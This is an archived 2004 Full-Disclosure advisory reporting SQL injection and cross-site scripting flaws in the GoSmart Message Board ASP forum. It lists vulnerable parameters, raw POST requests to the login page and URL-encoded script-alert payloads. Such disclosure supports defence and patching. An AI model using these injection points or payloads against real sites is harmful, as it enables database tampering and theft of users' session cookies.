NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2004-10

[Full-Disclosure] [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board

From: Alexander Antipov (antipovSecurityLab.ru)
Date: Mon Oct 11 2004 - 13:51:07 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).

Date: 11.10.04

Severity: Low

Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx

Platform: ASP

I. DESCRIPTION

--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote
user can conduct SQL injection attack and Cross site scripting attack.

1. SQL injection (minimal risk, because using Access database)

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=[SQL CODE HERE]&Password=1&Login=1

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=1&Password=[SQL CODE HERE]&Login=1

2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%
28%29%3C%2Fscript%3E%3C%22

II. IMPACT

----------

A remote user can access the target user's cookies (including
authentication cookies).

A remote user can cause SQL commands to be executed by the underlying
database.

III. SOLUTION

-------------
Not available currently.

IV. VENDOR FIX/RESPONSE

-----------------------
n/a

V. CREDIT

-------------
Positive Technologies (www.ptsecurity.com) is information security
company especially focused on development of MaxPatrol - professional
security scanner.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]